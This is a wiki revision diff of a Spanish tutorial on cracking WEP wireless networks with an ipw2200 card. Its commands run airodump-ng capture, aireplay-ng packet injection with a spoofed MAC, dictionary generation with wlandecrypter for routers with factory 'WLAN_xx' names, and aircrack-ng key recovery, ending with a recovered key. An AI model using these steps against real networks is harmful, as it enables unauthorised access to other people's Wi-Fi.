Legido Wiki

User Tools

Site Tools

Trace:
informatica:linux:wifi:crackear_redes:ipw2200

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
informatica:linux:wifi:crackear_redes:ipw2200 [2009/04/17 09:35] 194.179.83.89informatica:linux:wifi:crackear_redes:ipw2200 [2015/04/13 20:19] (current) – external edit 127.0.0.1
Line 38: Line 38:
  
   iwconfig eth3 essid "ESSID" key 11111111111   iwconfig eth3 essid "ESSID" key 11111111111
-  airodump-ng -c 6 -b BSID -w captura_ESSID rtap0+  airodump-ng -c 6 -b mac_del_ap -w captura_ESSID rtap0
   aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00:11:22:33:44:55 -i rtap0 ethx   aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00:11:22:33:44:55 -i rtap0 ethx
  
Line 51: Line 51:
 11.2 Contenido (OJO, comprobad las rutas): 11.2 Contenido (OJO, comprobad las rutas):
  
 +
 +<code>
 #!/bin/bash #!/bin/bash
  
Line 57: Line 59:
 # Ejemplo para un llavero usb # Ejemplo para un llavero usb
 cp /root/*cap /mnt/sda1/captura/ cp /root/*cap /mnt/sda1/captura/
 +</code>
  
 11.3 Grabar y cerrar 11.3 Grabar y cerrar
Line 79: Line 82:
  
 Existe una aplicación, 'wlandecrypter-ng' que, si la dirección MAC (BSSID) del router es una de las que soporta y el nombre del punto de acceso (ESSID) es del tipo 'WLAN_xx' (por tanto no se ha cambiado su valor de fábrica), genera un diccionario, con lo que se podrá obtener la clave del router con muy pocos paquetes (menos de 10) obtenidos. Existe una aplicación, 'wlandecrypter-ng' que, si la dirección MAC (BSSID) del router es una de las que soporta y el nombre del punto de acceso (ESSID) es del tipo 'WLAN_xx' (por tanto no se ha cambiado su valor de fábrica), genera un diccionario, con lo que se podrá obtener la clave del router con muy pocos paquetes (menos de 10) obtenidos.
 +
 +12.1 Teclear en una consola el siguiente comando:
 +
 +wlandecrypter BSSID ESSID /root/diccionario_ESSID
 +
 +Si el comando nos lanza un error, significa que la dirección MAC del router (BSSID) no está 'soportada' por wlandecrypter-ng.
  
 13. **OPCIONAL** 13. **OPCIONAL**
Line 88: Line 97:
   aptitude install aircrack-ng   aptitude install aircrack-ng
  
-12.1 Lanzar el comando: +14. Hay que estar al loro de la salida del comando 'airodump-ng', en especial de la columna que dice 'data', que son los paquetes capturados. 
- +
-wlandecrypter BSSID ESSID /root/diccionario_ESSID +
- +
-Si el comando nos lanza un error, significa que la dirección MAC del router (BSSID) no está 'soportada' por wlandecrypter-ng. +
- +
-13. Hay que estar al loro de la salida del comando 'airodump-ng', en especial de la columna que dice 'data', que son los paquetes capturados. +
  
 Cuando queramos intentar sacar la contraseña, lanzamos el siguiente comando: Cuando queramos intentar sacar la contraseña, lanzamos el siguiente comando:
Line 102: Line 105:
   aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap   aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap
  
-En caso contrario_+En caso contrario:
  
   aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap   aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap
Line 112: Line 115:
  Decrypted correctly: 100%  Decrypted correctly: 100%
 </code> </code>
 +
 +Es **MUY** recomendable pasar el fichero .cap a un pc con aircrack-ng instalado (ver paso 13), pues de ese modo se obtiene la clave en unos pocos segundos
 +
 +Postdata: Yo en clientes windows, le he metido la clave alfanumérica sin los dos puntos. En el ejemplo anterior, el valor introducido sería:
 +
 +  43303031443230334435443131
 +
  
  
informatica/linux/wifi/crackear_redes/ipw2200.1239960915.txt.gz · Last modified: 2015/04/13 20:19 (external edit)